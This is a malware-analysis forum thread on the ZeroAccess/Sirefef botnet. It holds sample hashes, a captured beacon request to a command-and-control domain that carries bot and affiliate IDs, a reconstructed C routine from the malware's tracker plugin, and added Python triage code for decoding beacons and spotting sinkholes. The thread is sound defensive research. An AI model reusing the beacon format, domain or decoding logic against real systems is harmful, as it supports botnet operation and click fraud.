A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18798  by rinn
 Mon Apr 01, 2013 5:03 pm
Hi.

They updated their dropper obfuscator several days ago, targeting msft generic detection :)

Best Regards,
-rin
 #18801  by EP_X0FF
 Mon Apr 01, 2013 6:39 pm
Well, I'm looking at this BH EK host and here we go with another 99% FUD ZeroAccess. They re-crypt it every 2-3 hours, making sure it will be delivered to the victim computer FUD.

Detection ratio: 1 / 46

SHA256: 7401aa159dcac523471bd379c205bc8bc8a5ee191eb5dcb27362db1e3562c70d
SHA1: 4991e4e6aa2ec6a225ed34eb06d42e014508320a
MD5: 6c78b452b5dc30c373509acc9439eb79

https://www.virustotal.com/en/file/7401 ... 364841160/
Attachments
pass: infected
 #18803  by EP_X0FF
 Tue Apr 02, 2013 4:08 am
ZeroAccess payload fetched from the network just now. Includes a freshly compiled dll.

win32 Sirefef payload
  • 000000cb
  • 00000004
  • 00000008
  • 80000000
  • 80000032
SHA1
84d27814aa3734393d9739dea9db2058dd8ef486
61023a418c73264f0a514f93c39ada01391b6e15
a3aa67884223f3e8f8c52afdbc779dcb19ff00e6
97d178f9f9541e90c2a527c3ff97a43a1b69cb25
6e181f5c9031430d1c4f36b99779d4f9d51eb208

win64 Sirefef payload
  • 000000cb
  • 00000004
  • 00000008
  • 80000000
  • 80000032 (included for wow64 compatibility)
  • 80000064 (compiled 1 Apr 2013)
SHA1
b4182854f7531e4f363e641ebdba33e3d9dfa691
a03758c7daf6e246059c3eebaa67244615d037d4
061a3739739904f13a5b9adcbf4ac2e8a3157b18
46c1319ee38510c365a4226621de30bdf7e462ff
810e28d4e7b28d658dc48a82f0c65b46149aae89
2b4144391ab409ec1017691fe54b16b951e3ec4d
Attachments (two archives)
pass: infected
 #18808  by EP_X0FF
 Tue Apr 02, 2013 12:19 pm
ZeroAccess HTTP request.
Code:
GET /8QQUW7RVYqeIdj0xLjImaWQ9Mjk2ODIxOTkzJmFpZD0zMDU2MiZzaWQ9MCZvcz02LjEtNjQ=pmzuGI87 HTTP/1.0
Host: xlotxdxtorwfmvuzfuvtspel.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Language: ru-ru
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Tue, 02 Apr 2013 11:45:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.4
xlotxdxtorwfmvuzfuvtspel.com
Code:
HTTP/1.1 200 OK
Date: Tue, 02 Apr 2013 12:14:41 GMT
Server: Apache
X-Sinkhole: malware-sinkhole
Content-Length: 0
Keep-Alive: timeout=1
Connection: Keep-Alive
Content-Type: text/html
Hi there :)
 #18811  by kmd
 Tue Apr 02, 2013 5:00 pm
@EP_X0FF

I started reversing the ZeroAccess dlls and so far have a couple of questions:

What is the purpose of 000000cb.@?
 #18812  by EP_X0FF
 Tue Apr 02, 2013 5:30 pm
As already mentioned a few times, this is a resource-only dll, used by the Sirefef tracker plugin 80000000.@ (used to track click fraud by botnet operators). Inside, in its resources, it contains an IP address and port. The resource with the IP+port pair, used to report clicks, has id = 33000.

Here is a piece of the reconstructed 80000000.@ code; it should be self-explanatory.
Code:
/* Reconstructed from 80000000.@ (needs the ntdll prototypes from winternl.h / ntdll.lib).
   SfTrkId, SfTrkIdLength, SfTrackerData, g_dwIP and g_wPort are the reconstruction's own
   names for the resource lookup (id 33000), the IP+port record and the decoded globals. */
NTSTATUS NTAPI SfGetGlobalTrackerData(PVOID DllHandle)
{
  NTSTATUS Status;
  PIMAGE_RESOURCE_DATA_ENTRY ResourceDataEntry = NULL;
  PVOID ResourceData = NULL;
  SfTrackerData tmpTrackerData;

  /* locate the tracker resource inside the resource-only 000000cb.@ dll */
  Status = LdrFindResource_U(DllHandle, &SfTrkId, SfTrkIdLength, &ResourceDataEntry);
  if ( NT_SUCCESS(Status) ) {
    /* the resource must be exactly one IP+port record */
    if ( ResourceDataEntry->Size == sizeof(SfTrackerData) ) {
      /* LdrAccessResource returns a pointer into the mapped image, so copy the record out */
      Status = LdrAccessResource(DllHandle, ResourceDataEntry, &ResourceData, NULL);
      if ( NT_SUCCESS(Status) ) {
        RtlCopyMemory(&tmpTrackerData, ResourceData, sizeof(SfTrackerData));
        /* both fields are stored XOR-obfuscated with fixed keys */
        g_dwIP = tmpTrackerData.DataIp ^ 0x4E8F9AF4;
        g_wPort = tmpTrackerData.DataPort ^ 0xF5AD;
      }
    }
  }
  return Status;
}
As for the above Sirefef plugins, their operators and/or server seem to be located in Latvia.
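The reconstructed routine above reads the tracker record out of the resource tree and XOR-decodes it in memory. The following is an added example, not code from the thread or from the malware: a pure-Python walker over a dumped .rsrc section that does the same lookup offline (type -> id 33000 -> language), applies the two XOR keys quoted in the post, and returns the reporting address. The record layout (a packed DWORD ip followed by a WORD port, 6 bytes, stored in in_addr byte order) and the resource type RT_RCDATA are assumptions; the page gives only the field names and the keys. The sample section is constructed inside the block with a TEST-NET address so the walker can be exercised without a sample.

```python
import struct
from ipaddress import IPv4Address
from typing import Iterator, Optional, Tuple

# XOR keys exactly as they appear in the reconstructed 80000000.@ code
KEY_IP = 0x4E8F9AF4
KEY_PORT = 0xF5AD
TRACKER_RES_ID = 33000
RT_RCDATA = 10  # assumption: the record is stored as RCDATA

# Assumption: packed DWORD ip + WORD port (6 bytes); the post does not give the struct layout.
TRACKER_FMT = "<IH"
TRACKER_SIZE = struct.calcsize(TRACKER_FMT)

_DIR = struct.Struct("<IIHHHH")   # IMAGE_RESOURCE_DIRECTORY
_ENTRY = struct.Struct("<II")     # IMAGE_RESOURCE_DIRECTORY_ENTRY (Id, OffsetToData)
_DATA = struct.Struct("<IIII")    # IMAGE_RESOURCE_DATA_ENTRY (RVA, Size, CodePage, Reserved)
_SUBDIR = 0x80000000              # high bit set: offset points at another directory


def _entries(rsrc: bytes, dir_off: int) -> Iterator[Tuple[int, int]]:
    """Yield (id, offset_field) for every entry of the directory at dir_off."""
    _, _, _, _, n_named, n_ids = _DIR.unpack_from(rsrc, dir_off)
    pos = dir_off + _DIR.size
    for _ in range(n_named + n_ids):
        yield _ENTRY.unpack_from(rsrc, pos)
        pos += _ENTRY.size


def find_resource(rsrc: bytes, rsrc_rva: int, res_type: int, res_id: int) -> Optional[bytes]:
    """Walk type -> id -> language and return the raw bytes of the first match.

    rsrc is the content of the .rsrc section and rsrc_rva its virtual address;
    data-entry offsets are RVAs, so they are translated back into section offsets.
    """
    for type_id, off in _entries(rsrc, 0):
        if type_id != res_type or not off & _SUBDIR:
            continue
        for name_id, off2 in _entries(rsrc, off & 0x7FFFFFFF):
            if name_id != res_id or not off2 & _SUBDIR:
                continue
            for _lang, off3 in _entries(rsrc, off2 & 0x7FFFFFFF):
                if off3 & _SUBDIR:
                    continue
                data_rva, size, _cp, _res = _DATA.unpack_from(rsrc, off3)
                start = data_rva - rsrc_rva
                if start >= 0 and start + size <= len(rsrc):
                    return rsrc[start:start + size]
    return None


def extract_tracker(rsrc: bytes, rsrc_rva: int) -> Optional[Tuple[str, int]]:
    """Mirror SfGetGlobalTrackerData: find id 33000, check the size, XOR-decode both fields."""
    blob = find_resource(rsrc, rsrc_rva, RT_RCDATA, TRACKER_RES_ID)
    if blob is None or len(blob) != TRACKER_SIZE:
        return None
    ip_raw, port_raw = struct.unpack(TRACKER_FMT, blob)
    ip = ip_raw ^ KEY_IP
    port = port_raw ^ KEY_PORT
    # Assumption: the DWORD holds the address in in_addr (network) byte order.
    return str(IPv4Address(struct.pack("<I", ip))), port


def build_sample_rsrc(ip: str, port: int) -> Tuple[bytes, int]:
    """Constructed test section: a three-level tree holding one RCDATA resource, id 33000."""
    rva = 0x3000
    ip_raw = struct.unpack("<I", IPv4Address(ip).packed)[0]
    record = struct.pack(TRACKER_FMT, ip_raw ^ KEY_IP, port ^ KEY_PORT)
    type_dir = _DIR.size + _ENTRY.size                # 0x18
    name_dir = type_dir + _DIR.size + _ENTRY.size     # 0x30
    data_entry = name_dir + _DIR.size + _ENTRY.size   # 0x48
    data = data_entry + _DATA.size                    # 0x58
    out = bytearray()
    out += _DIR.pack(0, 0, 0, 0, 0, 1) + _ENTRY.pack(RT_RCDATA, _SUBDIR | type_dir)
    out += _DIR.pack(0, 0, 0, 0, 0, 1) + _ENTRY.pack(TRACKER_RES_ID, _SUBDIR | name_dir)
    out += _DIR.pack(0, 0, 0, 0, 0, 1) + _ENTRY.pack(0x409, data_entry)
    out += _DATA.pack(rva + data, len(record), 0, 0)
    out += record
    return bytes(out), rva


if __name__ == "__main__":
    section, base = build_sample_rsrc("192.0.2.10", 8080)
    print(extract_tracker(section, base))
```

Dump the .rsrc section of a 000000cb.@ sample together with its virtual address (any PE parser gives both) and call `extract_tracker` on it; the size check is kept as in the reconstructed code, so a record of a different length returns `None` instead of decoding garbage.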
 #18814  by EP_X0FF
 Tue Apr 02, 2013 5:50 pm
kmd wrote:so if we know where they are, isn't that the way to shut down this botnet?
This idea is not new. Yes, it is possible to disrupt the support infrastructure of the botnet so that customers of Sirefef will not know the state of their operations, making their money look just like digits on the screen. However, we are sure they have a plan "B" for this. As already stated by Sophos, counteracting this will be just a question of a plugin update. As long as all operators do not simultaneously land in jail, the above shutdown won't work.
 #18816  by r3shl4k1sh
 Tue Apr 02, 2013 8:11 pm
EP_X0FF wrote:ZeroAccess HTTP request. [request and responses quoted from post #18808, with this header highlighted:]
X-Sinkhole: malware-sinkhole
Do you believe it is true?
I have seen that on another domain name used by ZA, and after a quick search on Google I found it here: http://labs.snort.org/files/DomainTakedowns.pdf
This is a presentation from VRT (Sourcefire) which mentions this X-Sinkhole.

But how can I be sure that it is really sinkholed?
 #18817  by EP_X0FF
 Wed Apr 03, 2013 2:44 am
r3shl4k1sh wrote:Do you believe it is true? [...] But how can I be sure that it is really sinkholed?
Yes, I believe it is true and it belongs to the Georgia Institute of Technology. From the list of domains in Sirefef, three of them belong to this sinkhole.

Quick googling of the 50.62.12.103 address revealed Flashback, Ramnit and MultiBanker (http://virustracker.info/text/MultiBank ... Others.txt).
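Two things in this thread are worth automating for anyone triaging proxy logs: the request path in post #18808, whose base64 segment (padded with random alphabet characters on both sides) carries the bot's beacon as a query-string-like record, and the X-Sinkhole header that r3shl4k1sh asked about. The block below is an added example, not code from the thread or from any of the projects mentioned: it recovers the beacon fields from the path by trying every start offset inside the base64 run and keeping the only one that decodes to printable text, and it flags a response that labels itself as a sinkhole. The sample request line and the two response header blocks are copied from the thread; the function and constant names are this example's own.

```python
import base64
import binascii
import re
from typing import Dict, Optional
from urllib.parse import parse_qsl

# Sample input copied from post #18808: the beacon request and the two answers
# (live nginx host first, then the sinkhole reply on a later connection).
REQUEST_LINE = ("GET /8QQUW7RVYqeIdj0xLjImaWQ9Mjk2ODIxOTkzJmFpZD0zMDU2MiZzaWQ9MCZvcz02LjEtNjQ="
                "pmzuGI87 HTTP/1.0")
RESPONSE_NGINX = """HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Tue, 02 Apr 2013 11:45:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.4
"""
RESPONSE_SINKHOLE = """HTTP/1.1 200 OK
Date: Tue, 02 Apr 2013 12:14:41 GMT
Server: Apache
X-Sinkhole: malware-sinkhole
Content-Length: 0
Keep-Alive: timeout=1
Connection: Keep-Alive
Content-Type: text/html
"""

# A run of base64 alphabet with optional '=' padding. The random characters the bot
# prepends are alphabet characters too, so the run is wider than the real payload.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _is_query_text(data: bytes) -> bool:
    """Printable ASCII containing an 'id=' pair is what the beacon decodes to."""
    return all(0x20 <= b < 0x7F for b in data) and b"id=" in data


def decode_beacon_path(path: str) -> Optional[Dict[str, str]]:
    """Recover the key=value beacon hidden in a ZeroAccess request path.

    Only the start offset that lines up with the real payload decodes to text;
    every other offset yields binary garbage and is rejected.
    """
    for match in _B64_RUN.finditer(path):
        run = match.group(0)
        for start in range(len(run)):
            chunk = run[start:]
            if len(chunk) % 4:
                continue
            try:
                data = base64.b64decode(chunk, validate=True)
            except binascii.Error:
                continue
            if _is_query_text(data):
                return dict(parse_qsl(data.decode("ascii"), keep_blank_values=True))
    return None


def request_path(request_line: str) -> str:
    """'GET /x HTTP/1.0' -> '/x'."""
    return request_line.split(" ", 2)[1]


def response_headers(raw: str) -> Dict[str, str]:
    """Parse a raw status line plus headers into a lower-cased name -> value dict."""
    headers: Dict[str, str] = {}
    for line in raw.strip().splitlines()[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def is_sinkhole_response(raw: str) -> bool:
    """True when the server labels itself with 'X-Sinkhole: malware-sinkhole'."""
    return response_headers(raw).get("x-sinkhole", "").lower() == "malware-sinkhole"


if __name__ == "__main__":
    print(decode_beacon_path(request_path(REQUEST_LINE)))
    print(is_sinkhole_response(RESPONSE_NGINX), is_sinkhole_response(RESPONSE_SINKHOLE))
```

For the request quoted in the thread, `decode_beacon_path` returns the version, bot id, affiliate id and an `os=6.1-64` field that matches the Windows NT 6.1 / Win64 User-Agent. The header check only answers the narrow question of whether the responding server says it is a sinkhole: the label is a courtesy set by the sinkhole operator, so a domain without it is not necessarily live, and the label alone is no substitute for confirming who owns the address, which is what the thread does with 50.62.12.103.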